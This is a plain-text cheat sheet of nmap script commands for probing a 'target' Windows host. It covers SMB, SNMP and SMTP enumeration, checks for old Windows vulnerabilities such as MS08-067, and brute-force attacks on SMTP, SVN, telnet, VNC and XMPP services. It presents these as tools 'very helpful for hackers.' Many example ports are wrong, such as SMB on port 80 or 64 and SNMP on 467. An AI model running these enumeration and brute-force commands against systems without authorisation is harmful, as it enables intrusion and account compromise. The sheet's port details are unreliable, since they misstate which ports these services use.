TO GET INFORMATION MANAGED BY MASTER BROWSER OF TARGET WINDOWS SYSTEM:

(nmap --script smb-mbenum -p+port +domain or ip of target) e.g.

(nmap --script smb-mbenum -p80 192.168.8.4)

TO GET THE INFORMATION OF OPERATING SYSTEM OF TARGET:

(nmap --script smb-os-discovery.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-os-discovery.nse -p80 192.168.8.4)

TO CHECK THE SECURITY LEVEL OF SMB SERVICE OF TARGET:

(nmap --script smb-security-mode.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-security-mode.nse -p64 192.168.8.4)

TO FIND THE SMB SERVER STATISTICS OF TARGET:

(nmap --script smb-server-stats.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-server-stats.nse -p64 192.168.8.4)

TO GET SOME INFORMATION ABOUT THE OS OF TARGET:

(nmap --script smb-system-info.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-system-info.nse -p80 192.168.8.4)

TO CHECK CONFICKER VULNERABILITY IN WINDOWS OS OF TARGET:

(nmap --script smb-vuln-conficker.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-vuln-conficker.nse -p80 192.168.8.4)

TO CHECK DOS VULNERABILITY IN WINDOWS OS OF TARGET:

(nmap --script smb-vuln-cve2009-3103.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-vuln-cve2009-3103.nse -p80 192.168.8.4)

TO CHECK MS06-025 VULNERABILITY IN WINDOWS OS OF TARGET:

(nmap --script smb-vuln-ms06-025.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-vuln-ms06-025.nse -p80 192.168.8.4)

TO CHECK MS07-029 VULNERABILITY IN WINDOWS OS OF TARGET:

(nmap --script smb-vuln-ms07-029.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-vuln-ms07-029.nse -p80 192.168.8.4)

TO CHECK MS08-067 VULNERABILITY IN WINDOWS OS OF TARGET:

(nmap --script smb-vuln-ms08-067.nse -p+port +domain or ip of target) e.g.

(nmap --script smb-vuln-ms08-067.nse -p80 192.168.8.4)

TO CHECK MS10-054 VULNERABILITY IN OS OF TARGET:

(nmap --script=smb-vuln-ms10-054 -p+port +domain or ip of target) e.g.

(nmap --script=smb-vuln-ms10-054 -p80 192.168.8.4)

TO CHECK MS10-061 VULNERABILITY IN TARGET OS:

(nmap --script=smb-vuln-ms10-061 -p+port +domain or ip of target) e.g.

(nmap --script=smb-vuln-ms10-061 -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON SMTP SERVER OF TARGET:

(nmap --script smtp-brute -p+port +domain or ip of target) e.g.

(nmap --script smtp-brute -p465 192.168.8.4)

TO RUN SMTP COMMANDS ON TARGET SMTP SERVICE:

(nmap --script smtp-commands.nse -p+port +domain or ip of target) e.g.

(nmap --script smtp-commands.nse -p465 192.168.8.4)

TO FIND THE VALID USERS OF SMTP SERVER OF TARGET:

(nmap --script smtp-enum-users.nse -p+port +domain or ip of target) e.g.

(nmap --script smtp-enum-users.nse -p465 192.168.8.4)

TO CHECK THE PORT OF SMTP SERVICE OF TARGET:

(nmap -sV --script=smtp-strangeport +domain or ip of target) e.g.

(nmap -sV --script=smtp-strangeport 192.168.8.4)

TO DISCOVER NETWORK INTERFACES OF TARGET USING SNMP:

(nmap -sU --script=snmp-interfaces -p+port +domain or ip of target) e.g.

(nmap -sU --script=snmp-interfaces -p467 192.168.8.4)

TO DISCOVER PROCESSES RUNNING USING SNMP ON TARGET SYSTEM:

(nmap -sU --script=snmp-processes -p+port +domain or ip of target) e.g.

(nmap -sU --script=snmp-processes -p467 192.168.8.4)

TO GET INFORMATION OF TARGET SYSTEM USING SNMP VERSION 1 SERVICE:

(nmap -sU --script snmp-sysdescr -p+port +domain or ip of target) e.g.

(nmap -sU --script snmp-sysdescr -p467 192.168.8.4)

TO GET THE WINDOWS SHARES OF TARGET:

(nmap -sU --script=snmp-win32-shares -p+port +domain or ip of target) e.g.

(nmap -sU --script=snmp-win32-shares -p80 192.168.8.4)

TO FIND THE SOFTWARE INSTALLED ON TARGET SYSTEM:

(nmap -sU --script=snmp-win32-software -p+port +domain or ip of target) e.g.

(nmap -sU --script=snmp-win32-software -p80 192.168.8.4)

TO FIND THE USERS OF TARGET WINDOWS OS:

(nmap -sU --script=snmp-win32-users -p+port +domain or ip of target) e.g.

(nmap -sU --script=snmp-win32-users -p80 192.168.8.4)

TO CHECK WHETHER AN OPEN SOCKS PROXY IS RUNNING ON TARGET:

(nmap --script=socks-open-proxy -p+port +domain or ip of target) e.g.

(nmap --script=socks-open-proxy -p8080 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON SVN OF TARGET:

(nmap --script svn-brute -p+port +domain or ip of target) e.g.

(nmap --script svn-brute -p567 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON TELNET SERVER OF TARGET:

(nmap --script telnet-brute -p+port +domain or ip of target) e.g.

(nmap --script telnet-brute -p543 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON VNC SERVER OF TARGET:

(nmap --script vnc-brute -p+port +domain or ip of target) e.g.

(nmap --script vnc-brute -p80 192.168.8.4)

TO PERFORM BRUTE FORCE ATTACK ON XMPP SERVICE OF TARGET:

(nmap --script xmpp-brute -p+port +domain or ip of target) e.g.

(nmap --script xmpp-brute -p9098 192.168.8.4)

So nmap is an all-in-one tool that is very helpful for hackers.
